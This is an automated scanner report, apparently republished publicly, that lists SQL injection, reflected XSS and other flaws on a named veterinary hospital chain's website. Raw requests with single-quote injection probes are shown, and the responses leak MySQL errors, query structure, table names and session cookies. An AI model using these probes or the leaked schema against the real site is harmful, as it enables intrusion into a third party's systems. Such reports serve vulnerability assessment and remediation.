XSS, SQL Injection, CWE-79, CWE-89, CAPEC-86, CAPEC-66, www.vcahospitals.com

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Mar 05 06:53:38 CST 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]

1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]

1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]

1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]

1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]

1.6. http://www.vcahospitals.com/main/img/sema-landing.jpg [REST URL parameter 1]

1.7. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

1.8. http://www.vcahospitals.com/main/offer [REST URL parameter 1]

1.9. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

1.10. http://www.vcahospitals.com/main/offer/ [REST URL parameter 1]

1.11. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

1.12. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 1]

1.13. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 1]

1.14. http://www.vcahospitals.com/marshfield [REST URL parameter 1]

1.15. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 1]

1.16. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 1]

1.17. http://www.vcahospitals.com/plymouth [REST URL parameter 1]

1.18. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 1]

1.19. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 1]

1.20. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]

2. Cross-site scripting (reflected)

2.1. http://www.vcahospitals.com/becker/markers.php [REST URL parameter 2]

2.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 2]

2.3. http://www.vcahospitals.com/hanson/appt.html [altphone parameter]

2.4. http://www.vcahospitals.com/hanson/appt.html [ampm1 parameter]

2.5. http://www.vcahospitals.com/hanson/appt.html [ampm2 parameter]

2.6. http://www.vcahospitals.com/hanson/appt.html [ampm3 parameter]

2.7. http://www.vcahospitals.com/hanson/appt.html [name of an arbitrarily supplied request parameter]

2.8. http://www.vcahospitals.com/hanson/offer.html [addr parameter]

2.9. http://www.vcahospitals.com/hanson/offer.html [captcha_code parameter]

2.10. http://www.vcahospitals.com/hanson/offer.html [city parameter]

2.11. http://www.vcahospitals.com/hanson/offer.html [email parameter]

2.12. http://www.vcahospitals.com/hanson/offer.html [fname parameter]

2.13. http://www.vcahospitals.com/hanson/offer.html [formtype parameter]

2.14. http://www.vcahospitals.com/hanson/offer.html [guid parameter]

2.15. http://www.vcahospitals.com/hanson/offer.html [ipaddress parameter]

2.16. http://www.vcahospitals.com/hanson/offer.html [js parameter]

2.17. http://www.vcahospitals.com/hanson/offer.html [lname parameter]

2.18. http://www.vcahospitals.com/main/offer [ parameter]

2.19. http://www.vcahospitals.com/main/offer [&optin parameter]

2.20. http://www.vcahospitals.com/main/offer [&state parameter]

2.21. http://www.vcahospitals.com/main/offer [addr parameter]

2.22. http://www.vcahospitals.com/main/offer [city parameter]

2.23. http://www.vcahospitals.com/main/offer [date parameter]

2.24. http://www.vcahospitals.com/main/offer [email parameter]

2.25. http://www.vcahospitals.com/main/offer [fname parameter]

2.26. http://www.vcahospitals.com/main/offer [formtype parameter]

2.27. http://www.vcahospitals.com/main/offer [gclid parameter]

2.28. http://www.vcahospitals.com/main/offer [guid parameter]

2.29. http://www.vcahospitals.com/main/offer [ipaddress parameter]

2.30. http://www.vcahospitals.com/main/offer [lname parameter]

2.31. http://www.vcahospitals.com/main/offer [name of an arbitrarily supplied request parameter]

2.32. http://www.vcahospitals.com/main/offer [newmex parameter]

2.33. http://www.vcahospitals.com/main/offer [optin parameter]

2.34. http://www.vcahospitals.com/main/offer [other parameter]

2.35. http://www.vcahospitals.com/main/offer [petage parameter]

2.36. http://www.vcahospitals.com/main/offer [petname parameter]

2.37. http://www.vcahospitals.com/main/offer [pettype parameter]

2.38. http://www.vcahospitals.com/main/offer [phone parameter]

2.39. http://www.vcahospitals.com/main/offer [r parameter]

2.40. http://www.vcahospitals.com/main/offer [referer parameter]

2.41. http://www.vcahospitals.com/main/offer [state parameter]

2.42. http://www.vcahospitals.com/main/offer [submit parameter]

2.43. http://www.vcahospitals.com/main/offer [token parameter]

2.44. http://www.vcahospitals.com/main/offer [tollfree parameter]

2.45. http://www.vcahospitals.com/main/offer [uri parameter]

2.46. http://www.vcahospitals.com/main/offer [useragent parameter]

2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]

2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]

2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]

2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]

2.51. http://www.vcahospitals.com/main/offer [variant parameter]

2.52. http://www.vcahospitals.com/main/offer [zip parameter]

2.53. http://www.vcahospitals.com/main/offer/ [ parameter]

2.54. http://www.vcahospitals.com/main/offer/ [&optin parameter]

2.55. http://www.vcahospitals.com/main/offer/ [&state parameter]

2.56. http://www.vcahospitals.com/main/offer/ [addr parameter]

2.57. http://www.vcahospitals.com/main/offer/ [city parameter]

2.58. http://www.vcahospitals.com/main/offer/ [date parameter]

2.59. http://www.vcahospitals.com/main/offer/ [email parameter]

2.60. http://www.vcahospitals.com/main/offer/ [fname parameter]

2.61. http://www.vcahospitals.com/main/offer/ [formtype parameter]

2.62. http://www.vcahospitals.com/main/offer/ [guid parameter]

2.63. http://www.vcahospitals.com/main/offer/ [ipaddress parameter]

2.64. http://www.vcahospitals.com/main/offer/ [lname parameter]

2.65. http://www.vcahospitals.com/main/offer/ [name of an arbitrarily supplied request parameter]

2.66. http://www.vcahospitals.com/main/offer/ [newmex parameter]

2.67. http://www.vcahospitals.com/main/offer/ [optin parameter]

2.68. http://www.vcahospitals.com/main/offer/ [other parameter]

2.69. http://www.vcahospitals.com/main/offer/ [petage parameter]

2.70. http://www.vcahospitals.com/main/offer/ [petname parameter]

2.71. http://www.vcahospitals.com/main/offer/ [pettype parameter]

2.72. http://www.vcahospitals.com/main/offer/ [phone parameter]

2.73. http://www.vcahospitals.com/main/offer/ [referer parameter]

2.74. http://www.vcahospitals.com/main/offer/ [state parameter]

2.75. http://www.vcahospitals.com/main/offer/ [submit parameter]

2.76. http://www.vcahospitals.com/main/offer/ [token parameter]

2.77. http://www.vcahospitals.com/main/offer/ [tollfree parameter]

2.78. http://www.vcahospitals.com/main/offer/ [uri parameter]

2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]

2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]

2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]

2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]

2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]

2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]

2.86. http://www.vcahospitals.com/marshfield/appt.html [REST URL parameter 2]

2.87. http://www.vcahospitals.com/marshfield/appt.html [name of an arbitrarily supplied request parameter]

2.88. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [REST URL parameter 2]

2.89. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [altphone parameter]

2.90. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm1 parameter]

2.91. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm2 parameter]

2.92. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ampm3 parameter]

2.93. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [appt_type parameter]

2.94. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [client parameter]

2.95. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date1 parameter]

2.96. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date2 parameter]

2.97. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [date3 parameter]

2.98. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [doctor parameter]

2.99. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [email parameter]

2.100. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [fname parameter]

2.101. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [guid parameter]

2.102. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [ipaddress parameter]

2.103. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [lname parameter]

2.104. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [name of an arbitrarily supplied request parameter]

2.105. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [optin parameter]

2.106. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [other parameter]

2.107. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petage parameter]

2.108. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [petname parameter]

2.109. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [pettype parameter]

2.110. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [phone parameter]

2.111. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [reason parameter]

2.112. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [referer parameter]

2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]

2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]

2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]

2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]

2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]

2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]

2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]

2.120. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [useragent parameter]

2.121. http://www.vcahospitals.com/plymouth/appt.html [REST URL parameter 2]

2.122. http://www.vcahospitals.com/plymouth/appt.html [name of an arbitrarily supplied request parameter]

2.123. http://www.vcahospitals.com/plymouth/more/boarding.html [REST URL parameter 2]

2.124. http://www.vcahospitals.com/hanson/appt.html [Referer HTTP header]

2.125. http://www.vcahospitals.com/hanson/appt.html [User-Agent HTTP header]

2.126. http://www.vcahospitals.com/main/offer [Referer HTTP header]

2.127. http://www.vcahospitals.com/main/offer [User-Agent HTTP header]

2.128. http://www.vcahospitals.com/main/offer/ [Referer HTTP header]

2.129. http://www.vcahospitals.com/main/offer/ [User-Agent HTTP header]

2.130. http://www.vcahospitals.com/main/offer/thank-you.html [Referer HTTP header]

2.131. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [Referer HTTP header]

2.132. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [User-Agent HTTP header]

2.133. http://www.vcahospitals.com/marshfield/appt.html [Referer HTTP header]

2.134. http://www.vcahospitals.com/marshfield/appt.html [User-Agent HTTP header]

2.135. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [Referer HTTP header]

2.136. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [User-Agent HTTP header]

2.137. http://www.vcahospitals.com/plymouth/appt.html [Referer HTTP header]

2.138. http://www.vcahospitals.com/plymouth/appt.html [User-Agent HTTP header]

3. SQL statement in request parameter

3.1. http://www.vcahospitals.com/main/offer

3.2. http://www.vcahospitals.com/main/offer/

3.3. http://www.vcahospitals.com/main/offer/thank-you.html

3.4. http://www.vcahospitals.com/tools/markers_sema.php

4. Session token in URL

4.1. http://www.vcahospitals.com/hanson/appt.html

4.2. http://www.vcahospitals.com/hanson/offer.html

4.3. http://www.vcahospitals.com/main/offer

4.4. http://www.vcahospitals.com/main/offer/

4.5. http://www.vcahospitals.com/main/offer/thank-you.html

4.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

5. Cookie without HttpOnly flag set

5.1. http://www.vcahospitals.com/hanson/appt.html

5.2. http://www.vcahospitals.com/hanson/offer.html

5.3. http://www.vcahospitals.com/main/offer

5.4. http://www.vcahospitals.com/main/offer/

5.5. http://www.vcahospitals.com/main/offer/thank-you.html

5.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

6. Referer-dependent response

6.1. http://www.vcahospitals.com/hanson/appt.html

6.2. http://www.vcahospitals.com/main/offer

6.3. http://www.vcahospitals.com/main/offer/

6.4. http://www.vcahospitals.com/main/offer/thank-you.html

6.5. http://www.vcahospitals.com/marshfield/appt.html

7. Cross-domain Referer leakage

7.1. http://www.vcahospitals.com/hanson/appt.html

7.2. http://www.vcahospitals.com/hanson/offer.html

7.3. http://www.vcahospitals.com/main/directory.html

7.4. http://www.vcahospitals.com/main/offer

7.5. http://www.vcahospitals.com/main/offer/thank-you.html

7.6. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

8. Cross-domain script include

8.1. http://www.vcahospitals.com/favicon.ico

8.2. http://www.vcahospitals.com/hanson

8.3. http://www.vcahospitals.com/hanson/appt.html

8.4. http://www.vcahospitals.com/hanson/offer.html

8.5. http://www.vcahospitals.com/main/directory.html

8.6. http://www.vcahospitals.com/main/offer

8.7. http://www.vcahospitals.com/main/offer/thank-you.html

8.8. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html

8.9. http://www.vcahospitals.com/marshfield

8.10. http://www.vcahospitals.com/marshfield/appt.html

8.11. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html

8.12. http://www.vcahospitals.com/plymouth

8.13. http://www.vcahospitals.com/plymouth/appt.html

8.14. http://www.vcahospitals.com/plymouth/more/boarding.html

9. TRACE method is enabled

10. Email addresses disclosed

11. HTML does not specify charset

11.1. http://www.vcahospitals.com/tools/SMSComm.php

11.2. http://www.vcahospitals.com/tools/markers_sema.php

12. Content type incorrectly stated

12.1. http://www.vcahospitals.com/tools/SMSComm.php

12.2. http://www.vcahospitals.com/tools/markers_sema.php



1. SQL injection  next
There are 20 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.vcahospitals.com/hanson [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='hanson''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''                        
                        limit 1' at line 31

Request 2

GET /hanson'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.13.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:08 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 9793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Conte
...[SNIP]...

1.2. http://www.vcahospitals.com/hanson/appt.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /hanson/appt.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /hanson'/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:47:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2242
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='hanson''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''hanson''                        
                        limit 1' at line 31

Request 2

GET /hanson''/appt.html HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/hanson
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.18.10.1299326665

Response 2

HTTP/1.1 302 Found
Date: Sat, 05 Mar 2011 12:47:38 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Location: http://www.vcahospitals.com
Content-Type: text/html
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...

1.3. http://www.vcahospitals.com/main/directory.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/directory.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/directory.html?utm_content=link.corp.ffe.locator. HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.5.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:45:55 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.4. http://www.vcahospitals.com/main/img/blockquote-left.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/blockquote-left.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-left.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:46 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
                        limit 1You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''main''                        
                        limit 1' at line 31

1.5. http://www.vcahospitals.com/main/img/blockquote-right.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /main/img/blockquote-right.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /main'/img/blockquote-right.png HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Referer: http://www.vcahospitals.com/main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5mvavkll88lopmn51r8r0kids0

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:11:56 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Length: 2238
Content-Type: text/html

select
                        ims_HospitalAddress.*,
                        ims_HospitalCustomService.*,                    
                        ims_HospitalFax.*,
                        ims_HospitalOtherContact.*,
                        ims_HospitalCustomService.*,
               
...[SNIP]...

                        left join ims_hospitallocation on ims_hospitallocation.i_hospital_id=ims_Hospital.i_hospital_id                        
                        where ims_Hospital.i_short_name='main''                        
